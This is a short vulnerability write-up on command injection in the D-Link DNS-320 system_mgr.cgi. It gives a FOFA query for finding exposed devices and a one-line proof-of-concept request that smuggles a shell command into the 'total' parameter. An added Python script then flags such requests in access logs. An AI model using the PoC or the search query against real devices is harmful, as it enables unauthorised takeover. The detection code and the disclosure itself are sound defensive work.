# D-Link ShareCenter DNS-320 system_mgr.cgi Remote Command Execution Vulnerability

### Vulnerability Description

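`system_mgr.cgi` on the D-Link ShareCenter DNS-320 is vulnerable to remote command execution; an attacker can exploit the vulnerability to take control of the server.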

### Affected Products

D-Link ShareCenter DNS-320

### FOFA

```
app="D_Link-DNS-ShareCenter"
```

### Vulnerability Reproduction

The login page looks like this:

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr0DFdH66XtvxzCIRl%2F-Mhr1o2CpipynI6qWEkQ%2Fimage.png?alt=media\&token=6b97b7c9-2ca7-48fd-bfa7-1dbf765717b2)

The PoC for the vulnerability is:

```
/cgi-bin/system_mgr.cgi?cmd=cgi_get_log_item&total=;ls;
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr0DFdH66XtvxzCIRl%2F-Mhr1rNJTDSaEFECjEUH%2Fimage.png?alt=media\&token=fa125a45-1a70-49e2-817e-426acaa93108)
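For detection, the request shape shown in the PoC can be matched in web or reverse-proxy access logs. The following is an added example, not part of the original page or any D-Link code: it flags `cgi_get_log_item` requests whose `total` value is not a plain number. The log format, the sample lines, and the assumption that a legitimate `total` is a decimal count are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (combined log format), not captured traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/system_mgr.cgi?cmd=cgi_get_log_item&total=20 HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/system_mgr.cgi?cmd=cgi_get_log_item&total=;ls; HTTP/1.1" 200 2048
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/system_mgr.cgi?cmd=cgi_get_log_item&total=%3Bls%3B HTTP/1.1" 200 2048
192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 128
"""

REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Assumption: a legitimate `total` is a plain decimal count (or empty).
NUMERIC_RE = re.compile(r"[0-9]*")


def query_params(query):
    """Split on '&' only, so ';' stays inside the value, then percent-decode."""
    params = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def suspicious_requests(log_text):
    """Return (source, decoded total) for cgi_get_log_item requests with a non-numeric total."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        url = urlsplit(match["target"])
        if not url.path.endswith("/cgi-bin/system_mgr.cgi"):
            continue
        params = query_params(url.query)
        if "cgi_get_log_item" not in params.get("cmd", []):
            continue
        for total in params.get("total", []):
            if not NUMERIC_RE.fullmatch(total):
                hits.append((match["src"], total))
    return hits


if __name__ == "__main__":
    for src, total in suspicious_requests(SAMPLE_LOG):
        print(f"{src} sent non-numeric total={total!r}")
```

Because the value is percent-decoded before the check, the encoded variant in the third sample line is flagged the same way as the literal one.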
